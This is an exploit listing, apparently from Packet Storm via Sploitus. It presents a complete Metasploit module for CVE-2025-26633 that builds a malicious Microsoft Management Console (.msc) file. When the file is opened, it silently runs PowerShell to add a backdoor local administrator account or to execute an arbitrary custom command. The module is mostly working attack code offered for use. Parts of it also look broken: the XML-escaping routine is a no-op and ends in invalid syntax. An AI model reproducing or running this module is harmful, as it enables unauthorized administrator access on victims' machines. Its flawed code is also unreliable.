Share
## https://sploitus.com/exploit?id=PACKETSTORM:219768
==================================================================================================================================
    | # Title     : Microsoft MMC (.MSC) File Execution Abuse Leading to Local Admin Creation Metasploit Module                      |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://www.microsoft.com                                                                                        |
    ==================================================================================================================================
    
    [+] Summary    : This Metasploit local Windows exploit module abuses the way Microsoft Management Console (MMC) processes specially crafted .msc files to achieve arbitrary PowerShell execution when a user opens the file.
                     The payload is designed to create a new local administrator account (or execute a custom command), but it only triggers when the victim manually opens the .msc file.
    
    [+] POC        :  
    
    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Exploit::Local
      Rank = ExcellentRanking
    
      include Msf::Post::Windows::Priv
      include Msf::Post::File
      include Msf::Exploit::FILEFORMAT
    
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'Microsoft MMC MSC EvilTwin - Local Admin Creation (CVE-2025-26633)',
            'Description' => %q{
              This module exploits a vulnerability in Microsoft Management Console (MMC)
              that allows arbitrary code execution when a user opens a specially crafted
              .msc file.
            },
            'License' => MSF_LICENSE,
            'Author' => [
              'indoushka'
            ],
            'Platform' => 'win',
            'Arch' => [ARCH_X64, ARCH_X86],
            'Targets' => [
              [
                'Windows (Local Admin Creation)',
                {
                  'Platform' => 'win',
                  'Arch' => [ARCH_X64, ARCH_X86],
                  'Type' => :windows_admin
                }
              ]
            ],
            'DefaultTarget' => 0
          )
        )
    
        register_options([
          OptString.new('FILENAME', [true, 'Output .msc filename', 'CVE-2025-26633-AddAdmin.msc']),
          OptString.new('USERNAME', [true, 'Local admin username to create', 'indoushka']),
          OptString.new('PASSWORD', [true, 'Local admin password', '112233Az-*/@!']),
          OptString.new('FULLNAME', [false, 'User full name', 'Lab User']),
          OptString.new('DESCRIPTION', [false, 'User description', 'Research account']),
          OptString.new('CUSTOM_COMMAND', [false, 'Custom command to execute instead of user creation', nil])
        ])
    
        register_advanced_options([
          OptBool.new('SILENT', [true, 'Run PowerShell silently', true]),
          OptBool.new('VERBOSE_OUTPUT', [true, 'Show verbose PowerShell output', false])
        ])
      end
    
      def exploit
        print_status("Creating malicious .msc file for CVE-2025-26633")
    
        filename = datastore['FILENAME']
        username = datastore['USERNAME']
        password = datastore['PASSWORD']
        fullname = datastore['FULLNAME']
        description = datastore['DESCRIPTION']
    
        powershell_cmd = build_powershell_payload(username, password, fullname, description)
        msc_content = build_msc_file(powershell_cmd)
    
        file_path = File.join(Msf::Config.local_directory, filename)
        File.binwrite(file_path, msc_content)
    
        print_good("Malicious .msc file created: #{file_path}")
    
        store_loot(
          'mmc.malicious.msc',
          'application/octet-stream',
          rhost,
          msc_content,
          filename,
          'Malicious MSC file for CVE-2025-26633'
        )
    
        print_status("[*] Requires victim interaction to open MSC file")
        print_status("[*] Example: mmc.exe \"#{filename}\"")
        print_status("[+] Admin user: #{username}")
      end
    
      private
    
      def build_powershell_payload(username, password, fullname, description)
        if datastore['CUSTOM_COMMAND'] && !datastore['CUSTOM_COMMAND'].empty?
          return datastore['CUSTOM_COMMAND']
        end
    
        ps_script = <<~PS
          $user = '#{username}';
          $pass = ConvertTo-SecureString '#{password}' -AsPlainText -Force;
          New-LocalUser -Name $user -Password $pass -FullName '#{fullname}' -Description '#{description}' -ErrorAction SilentlyContinue;
          Add-LocalGroupMember -Group 'Administrators' -Member $user -ErrorAction SilentlyContinue;
        PS
    
        ps_script = ps_script.strip.gsub(/\n\s+/, '; ')
    
        cmd = "powershell.exe -NoP"
    
        cmd += " -W Hidden" if datastore['SILENT']
        cmd += " -NoExit" if datastore['VERBOSE_OUTPUT']
    
        cmd += " -C \"#{ps_script}\""
    
        cmd
      end
    
      def build_msc_file(command)
        xml = <<~XML
          <?xml version="1.0" encoding="utf-16"?>
          <MMC_ConsoleFile ConsoleVersion="3.0">
            <SnapIns>
              <SnapIn>
                <Actions>
                  <Action>
                    <RunCommand>#{escape_xml(command)}</RunCommand>
                  </Action>
                </Actions>
              </SnapIn>
            </SnapIns>
          </MMC_ConsoleFile>
        XML
    
        xml.strip.encode('utf-16le')
      end
    
      def escape_xml(text)
        text.to_s
            .gsub('&', '&')
            .gsub('<', '<')
            .gsub('>', '>')
            .gsub('"', '"')
            .gsub("'", ''')
      end
    end
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================